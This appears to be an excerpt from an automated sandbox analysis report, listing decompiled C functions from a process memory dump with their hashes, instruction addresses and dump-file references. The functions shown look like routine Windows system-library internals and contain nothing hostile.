Opcode ID: 517fa740e52b7c7f2c6baa74753e4e214fc2d214233cc4b076a1260692c6cd8b
Instruction ID: 19905993346a97e38d2d70caca2f97c1deffcb24fedeb8108ab71e00f00224f7
Opcode Fuzzy Hash: 517fa740e52b7c7f2c6baa74753e4e214fc2d214233cc4b076a1260692c6cd8b
Instruction Fuzzy Hash: A00128765047419FCB11EF2AC940B1BB7E5ABC4310F04862AF8858B790DE30D840CB96

Uniqueness

Uniqueness Score: -1.00%

Function 03468A62, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E03468A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x348d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E033B7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E033DB640(E033D9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x03468a62
0x03468a71
0x03468a79
0x03468a82
0x03468a85
0x03468a89
0x03468a8c
0x03468a8f
0x03468a92
0x03468a95
0x03468a9f
0x03468ab1
0x03468aa1
0x03468aaa
0x03468aaa
0x03468abc
0x03468abd
0x03468abf
0x03468ac4
0x03468ada

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0caf34354ea6ffa5862f8455a75367620370f1070f033c789f217ee25f27a55a
Instruction ID: 0846732ea505e8fa5ffbb19ca8e91f0c2060e884a7e1750839577c5ccb10a865
Opcode Fuzzy Hash: 0caf34354ea6ffa5862f8455a75367620370f1070f033c789f217ee25f27a55a
Instruction Fuzzy Hash: 9D011A76E01218AFCB00DFA9E9819AEB7B8EF48350F10405AFA04EB341D634A9018BA5

Uniqueness

Uniqueness Score: -1.00%

Function 03468ED6, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E03468ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x348d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E033B7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E033DB640(E033D9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x03468ed6
0x03468ee5
0x03468eed
0x03468ef0
0x03468efa
0x03468f03
0x03468f0c
0x03468f15
0x03468f24
0x03468f27
0x03468f31
0x03468f43
0x03468f33
0x03468f3c
0x03468f3c
0x03468f4e
0x03468f4f
0x03468f51
0x03468f56
0x03468f69

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3573b042ce156a9b08b21c54be8dc33afdaddbfc38cd2529f91d11f7868e841e
Instruction ID: 4e69245d904afb1b29dadf80692330e2f8f238d74cd3c8948ad243e6492f57cb
Opcode Fuzzy Hash: 3573b042ce156a9b08b21c54be8dc33afdaddbfc38cd2529f91d11f7868e841e
Instruction Fuzzy Hash: 8B111B75E002199FDB04DFA8D441BAEFBF4FF08300F0442AAE918EB782E6349940CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0339DB60, Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0339DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0339DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0339E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0339E8B0(__ecx, _t14, 0xfff);
							L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x0339db64
0x0339db66
0x0339db6b
0x0339dbaa
0x0339db71
0x0339db76
0x0339db7a
0x0339dba3
0x0339db7c
0x0339db87
0x0339db8b
0x033f4fa1
0x033f4fb3
0x033f4fb8
0x0339db91
0x0339db96
0x0339db98
0x0339db98
0x0339db8b
0x0339db7a
0x0339db9d
0x0339dba2

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: a4e656ee421abc623754abf3b625be8a65b63c2588b4b308b76205b230100a6e
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: 53F06837645662DBFB32DA954CD1B67A6999FC1A60F190037B2059F644C9608C0297D1

Uniqueness

Uniqueness Score: -1.00%

Function 0339B1E1, Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0339B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E033B7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E033B7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E03417016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x0339b1e8
0x0339b1ea
0x0339b1f3
0x033f4a17
0x0339b1f9
0x0339b1f9
0x0339b1f9
0x0339b201
0x033f4a21
0x033f4a2e
0x00000000
0x00000000
0x033f4a3b
0x033f4a4d
0x033f4a3d
0x033f4a46
0x033f4a46
0x033f4a55
0x00000000
0x00000000
0x00000000
0x0339b20a
0x0339b20a
0x0339b20a
0x0339b20a

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: 6828e02ac3cc9d6c6b53ee81170c911ae881fae1ebeee6610226d9d09c017127
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: 3701A232200680DFDB22D65ADC84F5ABB98EF81790F0C00A2EA148FAB1D678C8008354

Uniqueness

Uniqueness Score: -1.00%

Function 0342FE87, Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0342FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x348d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E033B7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E033DB640(E033D9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0342fe96
0x0342fe9e
0x0342fea1
0x0342fead
0x0342feb3
0x0342feb9
0x0342fec3
0x0342fed5
0x0342fec5
0x0342fece
0x0342fece
0x0342fee0
0x0342fee1
0x0342fee3
0x0342fee8
0x0342fefb

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90fe84faf2f18f94bc06392b43b8016b48b967f98a93bea523485af305af1049
Instruction ID: 67d1134f348a44f90ad55845c9bb25008b849a277ab4feab2851b2c76c79e950
Opcode Fuzzy Hash: 90fe84faf2f18f94bc06392b43b8016b48b967f98a93bea523485af305af1049
Instruction Fuzzy Hash: DD016275E00318AFCB14DFA8D541A6EBBF4EF04300F544159A514EF382D635D901CB44

Uniqueness

Uniqueness Score: -1.00%

Function 03468F6A, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E03468F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x348d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E033B7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E033DB640(E033D9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x03468f6a
0x03468f79
0x03468f81
0x03468f84
0x03468f8b
0x03468f91
0x03468f94
0x03468f9e
0x03468fb0
0x03468fa0
0x03468fa9
0x03468fa9
0x03468fbb
0x03468fbc
0x03468fbe
0x03468fc3
0x03468fd6

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693593fb991a8aa0dbbfe2b7fe693a217badf5511aba40a6f43606615461140f
Instruction ID: a4c5128a50c7e98b4d27a41cac35f2aaff3771484eefb5e6bdf1ae5a1ffa6fcf
Opcode Fuzzy Hash: 693593fb991a8aa0dbbfe2b7fe693a217badf5511aba40a6f43606615461140f
Instruction Fuzzy Hash: 6B013C75E01208AFCB04EFA8E545AAEB7F4EF48300F10445AB905EF380EA74DA00CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0345131B, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0345131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x348d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E033B7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E033DB640(E033D9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x0345131b
0x0345132a
0x03451330
0x03451336
0x0345133e
0x03451341
0x03451344
0x0345134f
0x03451361
0x03451351
0x0345135a
0x0345135a
0x0345136c
0x0345136d
0x0345136f
0x03451374
0x03451387

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84de941294f8e7e62f164f4fb14b7e40d1da30ff59b4088834f72fd68a46eefb
Instruction ID: 905e3e4486ec231f716dfdcec438d2c115531f50253d763696e847dcf90d998b
Opcode Fuzzy Hash: 84de941294f8e7e62f164f4fb14b7e40d1da30ff59b4088834f72fd68a46eefb
Instruction Fuzzy Hash: 7A013C75E01208AFCB04EFA9D545AAEB7F4FF48740F00406ABD05EF381E6349A00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 033BC577, Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E033BC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E033BC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x33711cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E034688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x033bc577
0x033bc57d
0x033bc581
0x033bc5b5
0x033bc5b9
0x033bc5ce
0x033bc5ce
0x033bc5ca
0x00000000
0x033bc5ca
0x033bc5c4
0x033bc5c8
0x00000000
0x00000000
0x00000000
0x033bc5ad
0x00000000
0x033bc5af

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cc4f5c392341e3cd51dce567bd2689dec1dceb33bc2eea77b63a6184e0ff539
Instruction ID: 24b22f8e2a2c5368f049c32a29153ec8fb32c1061429e2a0fbd8cc685d86e8c9
Opcode Fuzzy Hash: 1cc4f5c392341e3cd51dce567bd2689dec1dceb33bc2eea77b63a6184e0ff539
Instruction Fuzzy Hash: 38F0B4B29157909FD731CB16C8C4BA2BBFC9B05670F4CA4A7D7058BD01C6A4DC84C251

Uniqueness

Uniqueness Score: -1.00%

Function 033D927A, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E033D927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L033B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E033DFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E033D92C6(_t11, _t14);
				}
				return _t11;
			}

0x033d9295
0x033d9299
0x033d929f
0x033d92aa
0x033d92ad
0x033d92ae
0x033d92af
0x033d92b0
0x033d92b4
0x033d92bb
0x033d92bb
0x033d92c5

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: 3c27c9ff62a85addb58d3f671138156db902e68385fcfac24d39eb7348cbb653
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: 21E09233B40A406BE761DE5AECC4F5777ADEF82B21F044079B9045E282CAE6DD0987A4

Uniqueness

Uniqueness Score: -1.00%

Function 03468D34, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E03468D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x348d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E033B7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E033DB640(E033D9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x03468d34
0x03468d43
0x03468d4b
0x03468d4e
0x03468d52
0x03468d5c
0x03468d6e
0x03468d5e
0x03468d67
0x03468d67
0x03468d79
0x03468d7a
0x03468d7c
0x03468d81
0x03468d94

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec148d77a349abd52dfefd94e5c761ee2e16cd7603137611fd67ff6c32858a6b
Instruction ID: b440349350b3a53933b1087b0963dc86c69dd72b0198a73073898e7e252876f9
Opcode Fuzzy Hash: ec148d77a349abd52dfefd94e5c761ee2e16cd7603137611fd67ff6c32858a6b
Instruction Fuzzy Hash: 7AF09075E047089FCB04EFB8E441A6EB7B4EF04200F108099E905AF281DA34D9008754

Uniqueness

Uniqueness Score: -1.00%

Function 03452073, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E03452073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0344FD22(__ecx);
				_t19 =  *0x348849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x3488748; // 0x0
					if(__eflags <= 0) {
						E03451C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x3488724 & 0x00000004;
							if(( *0x3488724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x3488724; // 0x0
					return E03448DF1(__ebx, 0xc0000374, 0x3485890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x03452076
0x03452078
0x0345207d
0x03452083
0x034520a4
0x034520aa
0x034520ac
0x034520b7
0x034520ba
0x034520bc
0x034520c9
0x034520c9
0x034520d0
0x034520d2
0x00000000
0x034520d2
0x034520be
0x034520c3
0x034520c5
0x034520c7
0x00000000
0x00000000
0x034520c7
0x034520bc
0x034520d4
0x03452085
0x03452085
0x034520a3
0x034520a3

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: A.00000002.476687065.0000000003370000.00000040.00000001InformationProcess.0000001Query
String ID:
API String ID: 1489403242-0
Opcode ID: 8756fb16ae1eb9c0981b6be7cb94c91efc82752b6bcc44e148029c47a78da29a
Instruction ID: b181ef997597cd65f5db952e80bb06471abaddc6e4d66ff70d782d86c0c15535
Opcode Fuzzy Hash: 8756fb16ae1eb9c0981b6be7cb94c91efc82752b6bcc44e148029c47a78da29a
Instruction Fuzzy Hash: 62F0A76BC172945BEE36FB2565013DA7BD5D745510F4D088BEE512F306C6758883CA1C

Uniqueness

Uniqueness Score: -1.00%

Function 03394F2E, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03394F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E034688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E033BC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x3371030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x03394f2e
0x03394f34
0x03394f38
0x033f0b85
0x033f0b85
0x033f0b89
0x033f0b9a
0x033f0b9a
0x033f0b9f
0x00000000
0x033f0b9f
0x033f0b94
0x033f0b98
0x00000000
0x00000000
0x00000000
0x033f0b98
0x03394f3e
0x03394f48
0x00000000
0x03394f6e
0x00000000
0x03394f70

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eda7d431abdf1061252cad8a0c08f619b8c3e5596a5bc2dbe2966722448e1ae
Instruction ID: 19bc089ddcd955151a2c7c66f183c364d233bf3b58f64df5a9731202424d59fe
Opcode Fuzzy Hash: 3eda7d431abdf1061252cad8a0c08f619b8c3e5596a5bc2dbe2966722448e1ae
Instruction Fuzzy Hash: EBF0E2369297848FDB74C71DCAC0B22B7ECAB047BCF8854A5D5058B922C728EC41C640

Uniqueness

Uniqueness Score: -1.00%

Function 03468B58, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E03468B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x348d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E033B7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E033DB640(E033D9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x03468b67
0x03468b6f
0x03468b72
0x03468b7d
0x03468b8f
0x03468b7f
0x03468b88
0x03468b88
0x03468b9a
0x03468b9b
0x03468b9d
0x03468ba2
0x03468bb5

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693c8834752cece40bf7f7e289f3349a101b978c972d474c72a16d89fa1da519
Instruction ID: f0c7c627a3687621d6e08c86d9e5473d52a6bba56f1cdbe9d7caf2429280ddff
Opcode Fuzzy Hash: 693c8834752cece40bf7f7e289f3349a101b978c972d474c72a16d89fa1da519
Instruction Fuzzy Hash: 80F05EB5E04258ABDB10EBA8E946E6EB3B4EF04600F04045DBA15AF381EA74D900C799

Uniqueness

Uniqueness Score: -1.00%

Function 03468CD6, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E03468CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x348d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E033B7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E033DB640(E033D9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x03468ce5
0x03468ced
0x03468cf0
0x03468cfb
0x03468d0d
0x03468cfd
0x03468d06
0x03468d06
0x03468d18
0x03468d19
0x03468d1b
0x03468d20
0x03468d33

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 820e1590dd7e2f6393905c42b7af1623206ee2552658aeb0e8a3e02ca65b54e6
Instruction ID: 23b1d14bb9f55fa0a648fc4ffcd5d7c12a7e362bac2a06ee94f5b10a6287ee9b
Opcode Fuzzy Hash: 820e1590dd7e2f6393905c42b7af1623206ee2552658aeb0e8a3e02ca65b54e6
Instruction Fuzzy Hash: 7AF08275E05208AFCB04EFB8E985EAEB7B4EF49200F14019AE915EF3C1EA34D900C759

Uniqueness

Uniqueness Score: -1.00%

Function 0339F358, Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0339F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E033CF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L033B4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x0339f35d
0x0339f361
0x0339f367
0x0339f372
0x0339f38c
0x0339f38c
0x0339f394

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
